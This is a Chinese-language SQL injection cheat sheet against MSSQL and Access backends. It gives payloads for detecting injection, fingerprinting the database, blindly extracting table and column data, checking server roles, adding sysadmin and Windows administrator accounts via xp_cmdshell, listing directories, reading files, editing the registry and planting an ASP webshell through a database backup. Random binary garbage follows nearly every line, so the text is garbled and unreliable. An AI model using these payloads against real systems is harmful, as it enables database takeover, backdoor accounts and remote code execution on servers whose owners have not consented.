1.判断是否有注入;and 1=1 ;and 1=2 kS:#�|yY8%
2.初步判断是否是mssql ;and user>0 d]"�4a�S��
�#/f~L�TE�
3.注入参数是字符'and [查询条件] and ''=' _#s,$K��#
Vq�p�C@C$
4.搜索时没过滤参数的'and [查询条件] and '%25'=' )�1KyUQ\�e
qq]�I��y�=
5.判断数据库系统 X<P
�<�-e9
nS*�Y+Q^9a
;and (select count(*) from sysobjects)>0 mssql \ �"$$c���
)<:TpMdU�k
;and (select count(*) from msysobjects)>0 access .\glNH1��d
T9�H*]�LxK
L/�V^��#�$
UNf�f�&E-
6.猜数据库 ;and (select Count(*) from [数据库名])>0 KP�>�9hEh
W�>)�0=8#\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %�&|�
uT��
Z�rr)<'!i�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �Cul=,;pkB
q*�3keB�;X
9.(1)猜字段的ascii值(access) J�t�@�lH�
Rb��XR/Rd
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 O6R)>Y�4�
El�V!�C}�g
(2)猜字段的ascii值(mssql) 5�;U�Iz@BJ
-�6H�wG�fU
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 x�I{4<m/0N
�q`b6i�f"�
10.测试权限结构(mssql) �Z,A�$h�>Z
d��Q.#�8o=
UI+6\�� 3�
�O�'mc�N*�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Mm��R6V#@:
]�f0'�YLG�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- .�Dr�!\.hL
c{�BAQZV�c
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �wG3�b�{�0
=�abcLrf2G
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �jk03� �Hd
b�j`�\;_oo
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 2!D��z�9m3
E,}{��iqAb
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 7|�DG�1p9C
v{VF>qE��P
;and 1=(select IS_MEMBER('db_owner'));-- o��g�5VB�
)hXTgU�Za
*WQ?r&[_'�
6FA+q��YSV
11.添加mssql和系统的帐户 o8 �JOp��D
<�$0i�s�:]
;exec master.dbo.sp_addlogin username;-- 4a+�gM._+O
;exec master.dbo.sp_password null,username,password;-- b-s�N#'TDg
�P�wl*5/l�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- '|[V}K5m/f
�<m�]0!�ii
;exec master.dbo.xp_cmdshell 'net user username password d-D,�Gx]>$
yx :�^�*/
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fY[Fwjj3��
1�^![8�>u"
;exec master.dbo.xp_cmdshell 'net user username password /add';-- "w'pIUQ�3,
,PTM'O@aU#
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �*��9^8NY]
a�hg:mlaob
A'D�FY� {�
I�)Xf4F�S@
12.(1)遍历目录 �]�P�0%S@]
&v�{#yz�M
;create table dirs(paths varchar(100), id int) g�Ed A
hfx
e0z�P LU}
;insert dirs exec master.dbo.xp_dirtree 'c:\' �Z8��#�nu�
7~e,"�^>T�
;and (select top 1 paths from dirs)>0 @M5�+12FYt
��Lt't� �
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) N}?|���ik�
� GfE�>?mG
��d:(Ex^^�
L,[Q/��$S8
(2)遍历目录 a)QT�#.��
1;tt�wF>G7
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �9|1ms�g�4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $r/��$aq=K
}��qn>#ETi
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �.N� X9A�b
G%
tlV&I�n
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 w�s�'e����
.Vb�d-jr'M
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 0K%ok�q|n
u7��L?9���
d�LiiJ6pl*
tYu<(Z(l)�
13.mssql中的存储过程 'x*C#��mt�
bY" zK',m�
xp_regenumvalues 注册表根键, 子键 $�o�Bs%.Jp
>K�u4Il+36
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 :?��6HG_9X
~)U5�0.�CH
xp_regread 根键,子键,键值名 &Hb%Q! ^Kb
"lh4V�g\7n
;exec xp_regread �
��J=`
8
�tO �M$'0u
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 <fvu)
��f
��41�X��`.
xp_regwrite 根键,子键, 值名, 值类型, 值 4&mY-��N7A
JbPk�C�*.
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 dy��&G~F28
,hn#�DJ�)�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 9� C[~*,qx
�Nk7y2�[��
xp_regdeletevalue 根键,子键,值名 {rc�3��`<%
Q,KNZxT,q
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 hIe�.Mv-I)
y�ww�A,9~�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 |Ea%nghl
B�l �b#�h
0/R;��g~q@
f .O^R�~,
14.mssql的backup创建webshell �Kb%�Y�%j
=X�R~���I�
use model ��W=+n�|1�
@�x�W��WN�
create table cmd(str image); �Bb/�if:XS
�?'�> .��>
insert into cmd(str) values (''); r���N}p�i@
&��
k���C
backup database model to disk='c:\l.asp'; /~NX<Ye��&
A6z�,6�v�6
(4�7?lw�
&
4�Zbn�8GpC
15.mssql内置函数 {=��GmXd%D
X
_ZO��)�|
;and (select @@version)>0 获得Windows的版本号 D�6bY�g `
|+
F ~zIu'
;and user_name()='dbo' 判断当前系统的连接用户是不是sa syl�7i�>�P
W�.j^L�;
;and (select user_name())>0 爆当前系统的连接用户 _��k@c�s^
$J�Y���\q2
;and (select db_name())>0 得到当前连接的数据库 [7�I:Dm��
�d���A�)T>
jF�N�0xG�Z
wn[)/*(,$(
16.简洁的webshell �L$�PbC!1�
`+,�?%W�)�
use model �p�1Ulo�G\
a=MN:s?Fc0
create table cmd(str image); � ��0s;~9>
x��S|9�Gk�
insert into cmd(str) values (''); Lz 1.�+:Ag
w/#7G�\�U
backup database model to disk='g:\wwwtest\l.asp';
